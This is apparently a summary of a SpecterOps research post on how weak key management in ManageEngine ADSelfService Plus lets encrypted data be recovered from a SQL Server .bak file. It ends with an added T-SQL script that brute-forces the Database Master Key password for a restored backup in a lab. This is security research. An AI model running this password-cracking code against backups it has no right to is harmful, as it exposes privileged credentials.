This blog post details a case study on recovering sensitive information from a SQL Server database backup (.bak) of ManageEngine's ADSelfService Plus. The author, a Service Architect at SpecterOps, walks through SQL Server's encryption key hierarchy and presents methods for recovering and decrypting the database keys. Ultimately, the case reveals weaknesses in how the product protects its keys that allow privileged credentials to be recovered from the backup alone.

Key points:

  • The author is a Service Architect at SpecterOps with a focus on technology solutions for assessments.
  • A SQL Server database backup from ManageEngine's ADSelfService Plus was obtained, but the sensitive data in it was encrypted.
  • The task was to recover that sensitive information with only the .bak file available.
  • After extensive research, the decryption keys and methods for attacking the encryption were identified.
  • SQL Server's encryption key hierarchy starts with the Service Master Key (SMK), which protects the Database Master Key (DMK); the DMK in turn protects the keys and certificates used to encrypt data.
  • Key recovery involved debugging tools and an understanding of SQL Server's encryption APIs.
  • The method revealed weaknesses in how ManageEngine's product stores its encryption keys.
  • The post discusses brute-forcing techniques for recovering the DMK password from material stored in the database backup.
  • The DMK password found in the database was a hardcoded example password taken from Microsoft's documentation.
  • The findings suggest that strong key-management practices are not implemented in this product, allowing sensitive data to be decrypted easily.
  • Lessons emphasized include validating a product's security in a lab environment before conducting serious research against it.
  • This blog post was presented at SOCON 2025, highlighting its relevance in the security community.
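The two key points above about the SMK/DMK hierarchy and about brute-forcing the DMK password can be tried in a lab. A DMK that is protected by the SMK opens automatically only on the instance that created it; after restoring a .bak on a different (lab) instance, the DMK can only be opened with its password. The T-SQL below is an added example, not code from the SpecterOps post or from ManageEngine: it inspects how the restored database's DMK is protected, lists what the DMK guards, and tries a small candidate list against it. The database name and the candidate passwords are constructed placeholders, not values from the post.

```sql
-- Added example (not from the original post). Run on a lab instance after
-- RESTORE DATABASE of the recovered .bak. Database name is an assumption.
USE [RestoredAppDb];
GO

-- 1. Is there a DMK, and is it also encrypted by the SMK? The SMK copy is
--    useless off the original server, so the password path is what matters.
--    symmetric_key_id 101 is always the database master key.
SELECT d.name                               AS database_name,
       d.is_master_key_encrypted_by_server  AS dmk_encrypted_by_smk,
       k.name                               AS dmk_name,
       k.algorithm_desc,
       k.create_date
FROM sys.databases AS d
LEFT JOIN sys.symmetric_keys AS k ON k.symmetric_key_id = 101
WHERE d.database_id = DB_ID();

-- 2. What does the DMK protect? Symmetric keys and certificate private keys
--    encrypted by the master key become decryptable once the DMK is open.
SELECT k.name, k.algorithm_desc, ke.crypt_type_desc
FROM sys.symmetric_keys  AS k
JOIN sys.key_encryptions AS ke ON ke.key_id = k.symmetric_key_id
WHERE k.symmetric_key_id <> 101;

SELECT c.name, c.pvt_key_encryption_type_desc, c.expiry_date
FROM sys.certificates AS c;

-- 3. Try candidate DMK passwords. OPEN MASTER KEY only accepts a string
--    literal, so each attempt is built with sp_executesql. Candidates below
--    are constructed for illustration; a real run would load a wordlist.
DECLARE @candidates TABLE (pw nvarchar(128) NOT NULL);
INSERT INTO @candidates (pw) VALUES
    (N'Password1'),
    (N'ExampleDmkPassword!'),
    (N'ChangeMe123');

DECLARE @pw       nvarchar(128),
        @sql      nvarchar(max),
        @found    nvarchar(128) = NULL,
        @last_err nvarchar(4000) = NULL;

DECLARE cand CURSOR LOCAL FAST_FORWARD FOR SELECT pw FROM @candidates;
OPEN cand;
FETCH NEXT FROM cand INTO @pw;
WHILE @@FETCH_STATUS = 0 AND @found IS NULL
BEGIN
    -- QUOTENAME with a single-quote delimiter doubles embedded quotes.
    SET @sql = N'OPEN MASTER KEY DECRYPTION BY PASSWORD = '
             + QUOTENAME(@pw, '''') + N';';
    BEGIN TRY
        EXEC sp_executesql @sql;   -- an opened key stays open for the session
        SET @found = @pw;
    END TRY
    BEGIN CATCH
        -- A wrong password raises "The key is not encrypted using the
        -- specified decryptor"; keep the last message for troubleshooting.
        SET @last_err = ERROR_MESSAGE();
    END CATCH
    FETCH NEXT FROM cand INTO @pw;
END
CLOSE cand;
DEALLOCATE cand;

IF @found IS NOT NULL
BEGIN
    SELECT @found AS recovered_dmk_password;
    -- Optional: re-protect the DMK with this instance's SMK so it opens
    -- automatically for later decryption work in the lab.
    ALTER MASTER KEY ADD ENCRYPTION BY SERVICE MASTER KEY;
    CLOSE MASTER KEY;
END
ELSE
    SELECT N'No candidate opened the DMK' AS result, @last_err AS last_error;
```

The query in step 1 is the check worth running on any restored backup before anything else: if `dmk_encrypted_by_smk` is 1 but the DMK cannot be opened, the SMK copy belongs to the original server and the password is the only way in. Step 3 is the same attack the post describes at a much smaller scale; the point is that if the password is something guessable such as a documentation example, a handful of attempts is enough to unlock every key the DMK protects.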

Full Story: https://posts.specterops.io/the-sql-server-crypto-detour-5ff9ac7033de?source=rss—-f05f8696e3cc—4